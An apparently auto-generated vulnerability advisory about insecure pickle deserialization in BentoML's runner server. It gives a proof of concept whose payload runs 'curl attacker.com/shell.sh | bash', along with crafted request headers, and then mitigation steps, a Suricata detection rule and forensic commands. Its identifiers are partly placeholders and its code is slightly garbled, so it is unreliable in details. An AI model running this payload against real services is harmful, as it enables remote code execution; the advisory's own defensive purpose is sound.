BentoML, Insecure Deserialization, CVE-2023-XXXX (Critical)

Listen to this Post

🐢▶️ Listen🚀

How the CVE Works:

The vulnerability stems from BentoML’s runner server improperly validating user-supplied headers during deserialization. When a POST request is sent with args-number: 1, the server processes the payload using _deserialize_single_param(). Attackers can manipulate Payload-Container, Payload-Meta, and `Batch-Size` headers to force the server into unsafe deserialization via pickle.loads(). By crafting a malicious pickle payload (e.g., using __reduce__), arbitrary OS commands execute. The exploit works with `NdarrayContainer` or PandasDataFrameContainer, as both trigger `pickle.loads()` when `format: “default”` is set in Payload-Meta.

DailyCVE Form:

Platform: BentoML
Version: <1.0.8
Vulnerability: Insecure Deserialization
Severity: Critical
Date: 2023-XX-XX

What Undercode Say:

Exploitation:

1. Craft Pickle Payload:

import pickle, os
class Exploit:
def <strong>reduce</strong>(self):
return (os.system, ('curl attacker.com/shell.sh | bash',))
payload = pickle.dumps(Exploit())

2. Send Malicious Request:

import requests
headers = {
"args-number": "1",
"Payload-Container": "NdarrayContainer",
"Payload-Meta": '{"format": "default"}',
"Batch-Size": "-1",
}
requests.post("http://victim:8888/", headers=headers, data=payload)

Mitigation:

1. Patch: Upgrade to BentoML >=1.0.8.

1. Input Validation: Reject `Content-Type: application/vnd.bentoml.pickled` unless explicitly required.
2. Sandboxing: Run BentoML in isolated containers with restricted syscall access.
3. Network Controls: Restrict runner-server ports (e.g., --port 8888) to trusted IPs.

Detection:

• Log Analysis:

  grep -r "Payload-Container" /var/log/bentoml/runner.log
  

• IDS Rule (Suricata):

  alert http any any -> $HOME_NET 8888 (msg:"BentoML Deserialization Exploit"; content:"args-number: 1"; content:"Payload-Container"; content:"format: default"; sid:1000001;)
  

Post-Exploit Forensics:

• Check Runner Logs:

  journalctl -u bentoml-runner --no-pager | grep "async_run"
  

• Inspect Active Connections:

  ss -tulnp | grep 8888
  

References:

• BentoML GHSA-xxxx
• CWE-502: Unsafe Deserialization

References:

Reported By: https://github.com/advisories/GHSA-7v4r-c989-xh26
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram